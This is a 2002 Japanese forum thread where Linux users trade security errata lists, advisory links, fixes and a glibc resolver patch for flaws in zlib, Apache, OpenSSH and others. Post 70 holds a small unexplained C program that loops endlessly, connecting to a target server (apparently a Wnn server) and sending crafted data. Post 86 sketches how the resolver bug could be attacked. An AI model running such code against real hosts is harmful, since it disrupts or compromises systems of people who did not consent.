[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 2chのread.cgiへ]
Update time : 05/09 12:58 / Filesize : 137 KB / Number-of Response : 618
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

皆様、セキュリティホールは埋めとけよ



1 名前:login:Penguin [02/02/02 13:55 ID:TzxKF1DS]
日々発見されるセキュリティホール。
その情報を一人であつめるのは大変です。情報の共有をしましょう。
先人達が埋めてくれた穴は、ありがたく反映させていただきましょう。

www.redhat.co.jp/support/errata/rh72-errata-security.html
www.turbolinux.co.jp/security/
www.vinelinux.org/errata/2x/i386.html
www.debian.org/security/

ML等からの情報もよろしく

4 名前:login:Penguin mailto:sage [02/02/02 16:45 ID:ZpBt8Xu4]
>>3
うち、Debianじゃないんだけど
apt-get upgrade
をcronさせとけば勝手に埋まりそうで良いなぁ〜
でも、これって「隣の花は赤い」みたいなものかなぁ・・・


5 名前:login:Penguin [02/02/02 16:51 ID:pTTak0WL]
自動実行すると、設定ファイルがデフォルトに戻ってしまってそれがかえって
穴になってしまうってことは無いのかな?


6 名前:login:Penguin mailto:sage [02/02/02 17:24 ID:iy9HS+C9]
>>5
DebianだとConffileはどうするか決められるでしょ

7 名前:login:Penguin mailto:sage [02/02/03 00:45 ID:kKB0w3Ro]
>>6
 やはり Debian 強いね。

 そういうおれは、手動アップの 厨房な夜

8 名前:login:Penguin mailto:sage [02/02/04 17:21 ID:wJQG6Z6M]
cron で upgrade すると対話的な質問のところで止まるという罠。


9 名前:login:Penguin [02/02/06 09:06 ID:wzRHhwGZ]
2/5 Vine-errata

version-up
at-3.1.8-23vl0.1.i386.rpm

security-hole
uucp-1.06.1-31vl0.i386.rpm
rsync-2.4.1-2vl1.i386.rpm


10 名前:login:Penguin [02/02/06 09:37 ID:z1OnXuT2]
Turbolinux
2002-02-01 mozilla 任意のホストのクッキーが不正に取得されてしまう

11 名前:login:Penguin mailto:sage [02/02/06 13:22 ID:aFEtGAeu]
関連スレッド
pc.2ch.net/test/read.cgi/unix/995966668/

12 名前:login:Penguin [02/02/06 16:18 ID:CGfU8woV]
彼女のセキュリティーホールを守るにはどうしたらいいですか?



13 名前:login:Penguin mailto:sage [02/02/06 16:35 ID:WFWamG0l]
>>12貞操帯

14 名前:login:Penguin mailto:sage [02/02/06 16:56 ID:IgP4o0CH]
>>13 予防的手段だけに頼ってはいけない。
インテグリティーチェックと定期的なログ監査。事後対策も忘れずに!

15 名前:login:Penguin mailto:sage [02/02/06 17:36 ID:suxHB5vN]
>>12
常時自分がログインしておくというのは?


16 名前:login:Penguin mailto:sage [02/02/06 17:50 ID:YEmPbmK+]
>>12
電源切っとけ。

17 名前:login:Penguin mailto:sage [02/02/06 19:28 ID:25EU2pWE]

 パッチうぉ   あてよう

18 名前:login:Penguin [02/02/18 21:43 ID:7km2bSU3]
SNMPセキュリティーホールage。
つーか、使ってる人いるのか?
使わんのだったら、パケジ消しとけ。
www.debian.org/
www.turbolinux.co.jp/security/


19 名前:login:Penguin mailto:sage [02/02/18 22:09 ID:Y/OOH446]
at, uucp, ucd-sntpなんて個人でLinuxやってる場合は要らんとおもう

20 名前:rrdtool [02/02/18 22:38 ID:e0R/XIhl]
net-snmp 4.2.3をtar玉から入れてる人は
snmpnetstatのfixパッチも当てたほうがエエぞ
fixパッチはredhatのSRPMから頂くとよろし

21 名前:login:Penguin [02/02/18 23:03 ID:xV7FaOh2]
uucp、ucd-snmpはともかく、atは...まぁ、無くてもこまらんか。

ともかく、RPM系のディストリビューションで、「全部」とかで
インストールしてると、入ってる可能性大だから、用チェック
かとおもうですはい。


22 名前:login:Penguin mailto:age [02/03/03 03:46 ID:631jyWWL]
ipchainsの設定をしてみました。この設定はどうでしょうか?

# ipchains -nL
Chain input (policy ACCEPT):
target prot opt source destination ports
fw all ------ 0.0.0.0/0 0.0.0.0/0 n/a
Chain forward (policy DENY):
target prot opt source destination ports
MASQ all ------ 192.168.1.0/24 0.0.0.0/0 n/a
Chain output (policy ACCEPT):
Chain fw (1 references):
target prot opt source destination ports
ACCEPT tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 25
ACCEPT tcp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023
ACCEPT udp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023
DENY tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023
DENY udp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023




23 名前:login:Penguin mailto:sage [02/03/03 12:16 ID:SZmEd9Su]
>>22
スレ違い。質問スレでやっとけ。

24 名前:login:Penguin [02/03/03 12:18 ID:SZmEd9Su]
www.turbolinux.co.jp/security/php-4.1.2-1.html
PHPボロボロだな

25 名前:login:Penguin [02/03/07 15:55 ID:cquF55ex]
3/6 Vine-errata

security hole
squid-2.3.STABLE5-0vl2.i386.rpm


26 名前:zlib! mailto:age [02/03/12 16:41 ID:UaXqoxZ1]
zlib祭りだYO!
www.linuxsecurity.com/articles/security_sources_article-4582.html
www.kb.cert.org/vuls/id/368819

27 名前:login:Penguin [02/03/12 21:43 ID:lpFBAfJZ]
www.zdnet.co.jp/news/0203/12/e_linux.html

28 名前:login:Penguin mailto:sage [02/03/12 21:57 ID:e6hdJtN/]
zlib祭り会場はどこですか?

29 名前:login:Penguin [02/03/12 23:21 ID:11TI6bf4]
>>28
あなたのおうちの犬箱です

30 名前:login:Penguin mailto:sage [02/03/12 23:25 ID:tWqbf2NQ]
ftp.mozilla.orgが繋がらないのはzlib祭りのお陰ですか?

31 名前:sage mailto:sage [02/03/13 00:41 ID:mlfLGoSb]
www.kb.cert.org/vuls/id/368819
cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0059
www.gzip.org/zlib/advisory-2002-03-11.txt
slashdot.jp/article.pl?sid=02/03/12/1325239&mode=nested
www.ipa.go.jp/security/news/news.html
www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020312_zlib



32 名前:login:Penguin [02/03/13 02:02 ID:Rw4EvJaU]
3/12 Vine-errata

security hole
openssh-2.9.9p2-0vl0.3.i386.rpm
openssh-clients-2.9.9p2-0vl0.3.i386.rpm
openssh-server-2.9.9p2-0vl0.3.i386.rpm
openssh-askpass-2.9.9p2-0vl0.3.i386.rpm



33 名前:login:Penguin [02/03/13 08:10 ID:P2nMMkSR]
げー、zlibやばいなぁ。ローカルからの攻撃には無力っぽいね。
ブラウザ経由の攻撃もできるのかなぁ...
(不正なPNG送るとかで)

34 名前:名無しさん@お腹いっぱい。 mailto:sage [02/03/13 09:00 ID:X9FAJrTn]
mod_gzipとかやばそうだね

35 名前:名無しさん@Emacs [02/03/13 10:03 ID:uVnzr98W]
>>33
まぁ何はなくともさっさとzlibを更新(-> 1.1.4)することだね。
pngやgzipを直接解釈するようなサーバでもない限り外部からの攻撃は受けない
だろうし、apacheをrootで動かしてるような豪快な奴も居ない(と信じたい)
だろうから、あまり大きな問題にはならないだろうけど。



36 名前:zlib! mailto:age [02/03/13 11:47 ID:zAIB51rk]
bugtraqに出てたH D Moore氏のpngの画像を
XEmacsでプレビューしたらXEmacsが落ちたYO!


37 名前:zlib! mailto:age [02/03/13 11:54 ID:zAIB51rk]
>>36
サンプル画像はここにもあるYO!
www.digitaloffense.net/openssh_zlib/

38 名前:login:Penguin mailto:sage [02/03/13 19:47 ID:dfFI4Er/]
>>36
他力本願で申し訳ないが、coreとか調べてみました?
結局どーなってどーなっちゃうのかよくわからんもので・・・。
stackoverflowと同様だと思ってればいいのかな〜

39 名前:login:Penguin mailto:sage [02/03/13 23:37 ID:7LNGAJrc]
apache って root で動かすとやばいの?

40 名前:login:Penguin mailto:sage [02/03/14 00:38 ID:6jzSzsuH]
>>39
そりゃやばいだろ (;´Д`)


41 名前:zlib! mailto:sage [02/03/14 11:03 ID:Ok5u5E1d]
>>38
XEmacs(bamboo)はsignal 11で落ちたみたい
coreはあるけどgdb扱える能力無いのよ。すまん
で、zlib最新にしてlibpngリコンパイルしたら落ちなくなったYO!


42 名前:login:Penguin mailto:sage [02/03/16 19:05 ID:49Bp+Ljr]
Debian セキュリティ HOWTO
www.jp.debian.org/doc/manuals/securing-debian-howto/



43 名前:login:Penguin [02/03/21 09:18 ID:l6UXxXqO]
3/21 Vine-errata

security hole

zlib-1.1.3-25vl0.i386.rpm
zlib-devel-1.1.3-25vl0.i386.rpm

cvs-1.11.1p1-7vl0.i386.rpm
dump-0.4b19-5.6x.1.i386.rpm
dump-static-0.4b19-5.6x.1.i386.rpm
kernel-2.2.19-0vl0.24.i386.rpm
kernel-2.2.19-0vl0.24.i586.rpm
kernel-2.2.19-0vl0.24.i686.rpm
kernel-BOOT-2.2.19-0vl0.24.i386.rpm
kernel-doc-2.2.19-0vl0.24.i386.rpm
kernel-headers-2.2.19-0vl0.24.i386.rpm
kernel-ibcs-2.2.19-0vl0.24.i386.rpm
kernel-pcmcia-cs-2.2.19-0vl0.24.i386.rpm
kernel-smp-2.2.19-0vl0.24.i386.rpm
kernel-smp-2.2.19-0vl0.24.i586.rpm
kernel-smp-2.2.19-0vl0.24.i686.rpm
kernel-source-2.2.19-0vl0.24.i386.rpm
kernel-utils-2.2.19-0vl0.24.i386.rpm
rmt-0.4b19-5.6x.1.i386.rpm
rpm-3.0.6-0vl2.1.i386.rpm
rpm-build-3.0.6-0vl2.1.i386.rpm
rpm-devel-3.0.6-0vl2.1.i386.rpm
rpm-python-3.0.6-0vl2.1.i386.rpm
popt-1.5.1-0vl2.1.i386.rpm
rsync-2.4.1-2vl2.i386.rpm
sash-3.4-2vl0.i386.rpm
info-4.0-5vl0.i386.rpm
texinfo-4.0-5vl0.i386.rpm


44 名前:login:Penguin [02/03/21 09:18 ID:l6UXxXqO]
3/21 Vine-errata

security hole

apache-1.3.23-0vl0.1.i386.rpm
apache-devel-1.3.23-0vl0.1.i386.rpm
apache-manual-1.3.23-0vl0.1.i386.rpm
mod_ssl-2.8.7-0vl0.1.i386.rpm

fileutils-4.0x-1vl4.i386.rpm

45 名前:login:Penguin [02/04/05 12:26 ID:ikMkS74J]
04/04 Vine-errata security hole

XFree86-3.3.6-13vl28.1.i386.rpm
XFree86-100dpi-fonts-3.3.6-13vl28.1.i386.rpm
XFree86-75dpi-fonts-3.3.6-13vl28.1.i386.rpm
XFree86-3DLabs-3.3.6-13vl28.1.i386.rpm
XFree86-8514-3.3.6-13vl28.1.i386.rpm
XFree86-AGX-3.3.6-13vl28.1.i386.rpm
XFree86-FBDev-3.3.6-13vl28.1.i386.rpm
XFree86-I128-3.3.6-13vl28.1.i386.rpm
XFree86-Mach32-3.3.6-13vl28.1.i386.rpm
XFree86-Mach64-3.3.6-13vl28.1.i386.rpm
XFree86-Mach8-3.3.6-13vl28.1.i386.rpm
XFree86-Mono-3.3.6-13vl28.1.i386.rpm
XFree86-P9000-3.3.6-13vl28.1.i386.rpm
XFree86-S3-3.3.6-13vl28.1.i386.rpm
XFree86-S3V-3.3.6-13vl28.1.i386.rpm
XFree86-SVGA-3.3.6-13vl28.1.i386.rpm
XFree86-VGA16-3.3.6-13vl28.1.i386.rpm
XFree86-W32-3.3.6-13vl28.1.i386.rpm
XFree86-XF86Setup-3.3.6-13vl28.1.i386.rpm
XFree86-Xnest-3.3.6-13vl28.1.i386.rpm
XFree86-Xvfb-3.3.6-13vl28.1.i386.rpm
XFree86-cyrillic-fonts-3.3.6-13vl28.1.i386.rpm
XFree86-devel-3.3.6-13vl28.1.i386.rpm
XFree86-doc-3.3.6-13vl28.1.i386.rpm
XFree86-libs-3.3.6-13vl28.1.i386.rpm
XFree86-xfs-3.3.6-13vl28.1.i386.rpm

46 名前:login:Penguin [02/04/11 21:08 ID:n5epu8MN]
04/11 Vine-errata

security hole
squid-2.3.STABLE5-0vl4.i386.rpm

47 名前:名無しさん [02/04/12 15:15 ID:357cbhyA]
ぼくの肛門も埋めてください

48 名前:login:Penguin [02/05/14 10:29 ID:nCRPXE+h]
05/14 Vine-errata security hole

sudo-1.6.3p6-0.6vl3.i386.rpm

49 名前:login:Penguin mailto:sage [02/05/28 18:43 ID:nc9YjYw6]
apt-get update
apt-get upgrade

だけでは不十分ですか?

50 名前:login:Penguin mailto:age [02/05/28 18:43 ID:nc9YjYw6]
age忘れ。

51 名前:login:Penguin [02/06/03 00:38 ID:ecxsuEIo]
僕のチンポの先も埋めてください

52 名前:login:Penguin [02/06/03 00:54 ID:Yo9snOlP]
>apt-get update
>apt-get upgrade
>
>だけでは不十分ですか?

ヴァカじゃん。そういう姿勢がそもそもsecurity hole



53 名前:login:Penguin [02/06/06 13:09 ID:H4e/6DmJ]
06/06 Vine-errata security hole

fetchmail-5.9.11-0vl1.i386.rpm

imap-2001a-10vl1.i386.rpm
imap-devel-2001a-10vl1.i386.rpm

bzip2-1.0.1-3vl3.i386.rpm
bzip2-devel-1.0.1-3vl3.i386.rpm


54 名前:login:Penguin [02/06/13 09:25 ID:+8hN98ol]
06/13 Vine-errata security hole

tcpdump-3.6.2-13vl1.i386.rpm
libpcap-0.6.2-13vl1.i386.rpm
arpwatch-2.1a11-13vl1.i386.rpm


55 名前:login:Penguin [02/06/18 15:41 ID:Y4ljwPvb]
Apacheにセキュリティホール
slashdot.jp/article.pl?sid=02/06/18/0434227

UNIX板 Apache関連 Part2
pc.2ch.net/test/read.cgi/unix/1017812420/466n-


56 名前:login:Penguin mailto:sage [02/06/19 08:45 ID:HipJ6wEK]
バグフィクスされたapacheがリリースされたそうです。

www.apache.org/dist/httpd/Announcement.html
httpd.apache.org/info/security_bulletin_20020617.txt

57 名前:login:Penguin [02/06/19 23:43 ID:APWNucgQ]
06/19 Vine-errata security hole

apache-1.3.26-0vl1.i386.rpm
apache-devel-1.3.26-0vl1.i386.rpm
apache-manual-1.3.26-0vl1.i386.rpm
mod_ssl-2.8.9-0vl1.i386.rpm

58 名前:login:Penguin [02/06/20 10:16 ID:01vvi0s8]
>>55
Red Hat
rhn.redhat.com/errata/RHSA-2002-103.html

59 名前:login:Penguin [02/06/20 10:44 ID:gutuxgNU]
Debian (potato)
DSA-131-1 apache -- remote DoS / exploit
www.debian.org/security/2002/dsa-131

DSA-132-1 apache-ssl -- remote DoS / exploit
www.debian.org/security/2002/dsa-132


60 名前:login:Penguin [02/06/20 13:37 ID:RkoCmceO]
Apache のそれは 32bit Linux でもヤバそう。
某MLにexploitが流れてた。



61 名前:login:Penguin [02/06/20 13:56 ID:gutuxgNU]
Apache Web サーバプログラムの脆弱性に関する注意喚起 www.jpcert.or.jp/at/2002/at020003.txt

62 名前:login:Penguin [02/06/20 14:06 ID:RkoCmceO]
情報スカスカのJPCERT勧告なんぞ読んでも仕方無いぞ。ほい日本語版。
www.lac.co.jp/security/intelligence/CERT/CA-2002_17.html



63 名前:login:Penguin mailto:sage [02/06/20 14:24 ID:01vvi0s8]
こっちはそれなりに有用。
www.ipa.go.jp/security/ciadr/20020619apache.html

64 名前:名無しさん mailto:sage [02/06/22 23:55 ID:STj3pUTJ]
「くだ質」とどちらに投げようか迷った挙げ句、こちらに
投げることにしました。
以下のような自分の使用状況がセキュリティの面で安全か
どうか伺いたく存じます。
自宅でLinuxを使っています。Flets ADSLを契約しており、
常時接続ではなく、時々インターネットに接続して電子
メールを読み書きしたり、WWWで情報を得たりしています。
ルータ等は使っていません。他のホストにwwwやftpで
クライエントとして接続することはあっても、自ホストを
サーバにする必要は殆どないと考えています。ただ例外で、
smtpサーバとしてnullmailerを使っています。
Debian GNU/Linux sidを使っており、電源を入れる度に
apt-getでパッケージを更新しています。
ftpd、rsh-server、ssh、apache等は削除しています。
kernelは2.4.18です。
/etc/hosts.allowは何も記述せず、
/etc/hosts.denyはALL: ALLにしてます。
# netstat --tcp --all
は、
Proto 受信-Q 送信-Q 内部アドレス 外部アドレス 状態
tcp 0 0 *:time *:* LISTEN
tcp 0 0 *:32927 *:* LISTEN
tcp 0 0 xxx.yyy.zzz.uuu:33011 aaa.bbb.ccc.ddd:smtp TIME_WAIT
となります(xxx.yyy.zzz.uuuは割り当てられたIPアドレス、
aaa.bbb.ccc.dddはプロバイダのメールサーバのIPアドレス)。


65 名前:login:Penguin mailto:sage [02/06/23 00:03 ID:bXEc0h6E]
>>64
> 以下のような自分の使用状況がセキュリティの面で安全か
> どうか伺いたく存じます。
「安全」と「安全でない」の2つしか状態がないと思ってる?

66 名前:login:Penguin [02/06/23 00:47 ID:knGXFfYf]
Apache の脆弱性を攻撃するツールが登場
slashdot.jp/article.pl?sid=02/06/22/1240249&mode=thread

67 名前:login:Penguin [02/06/23 01:02 ID:kepzSriJ]
>>66
充分に気をつけているほうだと思うよ。
でもセキュリティにこれで完璧ってのは無いんだよ。
あくまでコストとリスクとの綱引きでしかない。
しかしそれで侵入されたからって君を責める人はあまりいないだろう。

68 名前:login:Penguin mailto:sage [02/06/23 01:25 ID:xLORxFdI]
>>66
inetdも止めてしまおう。

69 名前:login:Penguin [02/06/25 15:34 ID:drybiZ1b]
OpenSSH に新たな弱点発見。詳細は来週まで秘密。
リモートから悪用可能らしい。
3.3 にも同じ弱点があるが、侵入は防げるそうだ。

70 名前:login:Penguin mailto:sage [02/06/25 22:33 ID:yPSMZ+Jm]
void writei(int fd,int num){num = htonl(num);write(fd,&num,4);}
void writes(int fd,char *s){write(fd,s,strlen(s)+1);}
void main(int argc,char **argv){struct hostent *he;struct sockaddr_in si;int fd;
char a[10];he = gethostbyname(argv[1]);while(1){fd = socket(PF_INET,SOCK_STREAM,0);si.sin_family = AF_INET;memcpy(&si.sin_addr,he->h_addr_list[0],sizeof(si.sin_addr));
si.sin_port = htons(22273);connect(fd,(struct sockaddr *)&si,sizeof(si));sprintf(a,"%d",rand());writei(fd,0x66);writei(fd,0);
writes(fd,a);writei(fd,0);writei(fd,3);close(fd);}}

71 名前:login:Penguin [02/06/25 22:46 ID:LJSlbrtr]
>>69
これだね。
Debian 以外のパッケージはいつころ出るんだろ。
www.koka-in.org/~haruyama/ssh_koka-in_org/0/4.html

72 名前:login:Penguin mailto:sage [02/06/26 09:06 ID:yIavaL89]
>70
Wnnか?何の穴よ?
まさかwww.freewnn.orgにある大昔の穴じゃないだろうな。



73 名前:login:Penguin mailto:sage [02/06/26 20:58 ID:0uLnP27B]
>>72
違うっぽい。

74 名前:login:Penguin [02/06/26 22:51 ID:knPs+H7Y]
*BSD の libc の resolver に穴が見つかったようだけど、glibc は
どうなんだろう
www.pine.nl/advisories/pine-cert-20020601.html


75 名前:login:Penguin [02/06/27 00:16 ID:UFWmO8g6]
ISS から OpenSSH のアドバイザリが出た。
Challenge and Response 認証にバグ。remote root exploit。
sshd_config に
ChallengeResponseAuthentication no
で回避可能。3.4 で修正されている。
これがもし Theo の言ってた穴と同じものなら、
OpenSSH 3.0 以降にのみ存在する穴じゃん。
いちはやくアップデート出した Debian potato は踊らされただけか。

76 名前:login:Penguin [02/06/27 00:18 ID:UFWmO8g6]
OpenSSH Advisory
www.openssh.com/txt/preauth.adv

77 名前:login:Penguin [02/06/27 00:19 ID:UFWmO8g6]
さみだれ式でごめん。ISS Advisory
www.openssh.com/txt/iss.adv

78 名前:login:Penguin [02/06/27 00:31 ID:UFWmO8g6]
>>75
訂正。3.0 以降じゃなくて 2.9.9 以降に弱点がある模様。
Debian 2.2 (potato) は安全な 1.2 系からわざわざ弱点のある
3.3 に入れ換えさせられた恰好だよ。Theo のアホーーーーー。
フルディスクロージャってやっぱり大事なんだな。

79 名前:login:Penguin [02/06/27 01:53 ID:b3kvzA+X]
06/27 Vine-errata security hole

openssh-3.3p1-0vl10.i386.rpm
openssh-server-3.3p1-0vl0.i386.rpm
openssh-clients-3.3p1-0vl0.i386.rpm
openssh-askpass-3.3p1-0vl0.i386.rpm
openssh-askpass-gnome-3.3p1-0vl0.i386.rpm


80 名前:login:Penguin mailto:sage [02/06/27 01:59 ID:b3kvzA+X]
>>79 は 06/26 発行でした。スマソ

81 名前:login:Penguin [02/06/27 11:42 ID:/viQ/aAY]
openssh 3.4p1出てるよage


82 名前:login:Penguin mailto:sage [02/06/27 11:52 ID:EftB/YmL]
syslogdが大きい。



83 名前:login:Penguin [02/06/27 16:56 ID:QDJgHCs7]
resolver のバグは対岸の火事ではない模様。

84 名前:login:Penguin mailto:sage [02/06/27 17:20 ID:/viQ/aAY]
2ch鯖のApacheも入れ替えが始まってるね。 遅いぐらいだ。昨日の件もこれが絡んでたのだろうか。 しかし入れ替えたはいいがlinuxのlibcにも。。。。 なんてことになったら大火事だな。

85 名前:login:Penguin mailto:sage [02/06/27 18:16 ID:d3NH2M4p]
>>84
まさに大火事のようで(藁
まあ、リモートからいじれる穴ではないだろうけど


86 名前:login:Penguin [02/06/27 18:57 ID:QDJgHCs7]
>>85
resolver のバグはリモートからいじれる。
攻撃者は自由に設定出来るネームサーバを持っていればいい。
ある IP アドレスの逆引きホストネームに攻撃用コードを仕込む。
そしてその IP アドレスから攻撃対象のサーバに接続する。
攻撃対象のサーバが逆引きを行い、
返って来た巧妙に細工されたホスト名を正引きしたら、あぼーん。

87 名前:login:Penguin mailto:sage [02/06/27 20:05 ID:4+mBkHBL]
glibcには*BSDよりも1箇所余計にチェックが入っているが、
これでは防げないのか?

88 名前:login:Penguin mailto:sage [02/06/27 20:31 ID:GRjz2eTH]
OpenSSHを3.1→3.4にアップグレードしたら、sshdの起動時に
This platform does not support both privilege separation and compression
Compression disabled
こんなメッセージを吐くんだけど・・・何だろ?syslogには上がらないみたいだけど気になるかな。

ちなみにRedHat6.2(kerner2.2.19/glibc2.1.3-23/OpenSSL0.9.6d)

89 名前: mailto:sage [02/06/27 20:37 ID:oX2io58x]
>>88
Compressionは切ろう。



90 名前:login:Penguin [02/06/27 20:41 ID:QDJgHCs7]
>>87
実際テストしてみたが落せない。
俺がヘボなだけかもしれないから識者の意見を待とう。

91 名前:88 mailto:sage [02/06/27 20:42 ID:GRjz2eTH]
>>89
sshd_configのCompressをnoに指定したら出なくなったよ。
感謝。


92 名前:login:Penguin mailto:sage [02/06/27 21:00 ID:4+mBkHBL]
>>90
FreeBSDをパッチを見るに、gethnamaddr.cはずでにFreeBSDの
パッチと同じ処理が入っている。getnetnamadr.cにはない。



93 名前:login:Penguin [02/06/27 21:00 ID:QDJgHCs7]
>>90
識者の意見が間違ってた Aapche の時のような事もあるから
itojun 氏のパッチあててもいいかもしれない。
でも勇み足で必要でないアップデートを出して、わざわざ穴を
開けてしまったDebian potato の例もあるし、悩ましいところだな。

94 名前:login:Penguin [02/06/27 21:13 ID:QDJgHCs7]
識者登場age。

95 名前:login:Penguin mailto:sage [02/06/27 21:32 ID:4+mBkHBL]
直すべきは nss_dns/dns-network.c か。
古いの見てた。すまそ。

96 名前:login:Penguin [02/06/28 11:19 ID:CALm/HoI]
新しいBINDが出た


97 名前:login:Penguin mailto:sage [02/06/28 13:40 ID:PahA8xFy]
>>93
itojunさんのパッチってどこでgetできます?
glibcに当たるのかいな?

98 名前:login:Penguin [02/06/28 16:13 ID:DZqksx+C]
>>97
FreeBSD や NetBSD の Advisory 嫁。
そのままでは当たらないだろうから手作業で当てれ。
ま、俺はめんどいから様子見。

99 名前:login:Penguin mailto:sage [02/06/28 20:57 ID:Yj/G45g0]
つーか、おまえら誰もglibcのコード読んでないんとちゃうか?

100 名前:login:Penguin mailto:sage [02/06/28 21:47 ID:Yj/G45g0]
--- glibc-2.2.5/resolv/nss_dns/dns-network.c.org 2001-07-06 13:55:39.000000000 +0900
+++ glibc-2.2.5/resolv/nss_dns/dns-network.c 2002-06-28 21:42:26.000000000 +0900
@@ -328,7 +328,9 @@
}
cp += n;
*alias_pointer++ = bp;
- bp += strlen (bp) + 1;
+ n = strlen(bp) + 1;
+ bp += n;
+ linebuflen -= n;
result->n_addrtype = class == C_IN ? AF_INET : AF_UNSPEC;
++have_answer;
}
こんなとこではないかな。gethnamaddr.cはFreeBSDのパッチと同様の
処理がすでに入っている。

101 名前:名無しさん@XEmacs mailto:sage [02/06/29 01:29 ID:cleVXGS3]
>>100
> こんなとこではないかな。gethnamaddr.cはFreeBSDのパッチと同様の
> 処理がすでに入っている。

name6.c のチャンクは? と思ったけど,'99 に直ってるすね.

ttp://sources.redhat.com/cgi-bin/cvsweb.cgi/libc/resolv/nss_dns/dns-host.c.diff?r1=1.15&r2=1.16&cvsroot=glibc&f=h



102 名前:login:Penguin [02/06/29 04:06 ID:uLF75Z2Y]
>>79 Vine-errata security hole

openssh-3.4p1-0vl2.i386.rpm
openssh-server-3.4p1-0vl2.i386.rpm
openssh-clients-3.4p1-0vl2.i386.rpm
openssh-askpass-3.4p1-0vl2.i386.rpm
openssh-askpass-gnome-3.4p1-0vl2.i386.rpm



103 名前:login:Penguin mailto:sage [02/07/02 09:30 ID:QAyrQPMn]
>>100-101
通報しますた。


104 名前:login:Penguin mailto:sage [02/07/02 11:35 ID:qVWzSPns]
www.sendmail.org/8.12.5.html
> 8.12.5/8.12.52002/06/25
> SECURITY: The DNS map can cause a buffer overflow if the user
> specifies a dns map using TXT records in the configuration
> file and a rogue DNS server is queried. None of the
> sendmail supplied configuration files use this option hence
> they are not vulnerable. Problem noted independently by
> Joost Pol of PINE Internet and Anton Rang of Sun Microsystems.
普通の設定では影響なし、なのかな?






[ 続きを読む ] / [ 携帯版 ]

前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<137KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef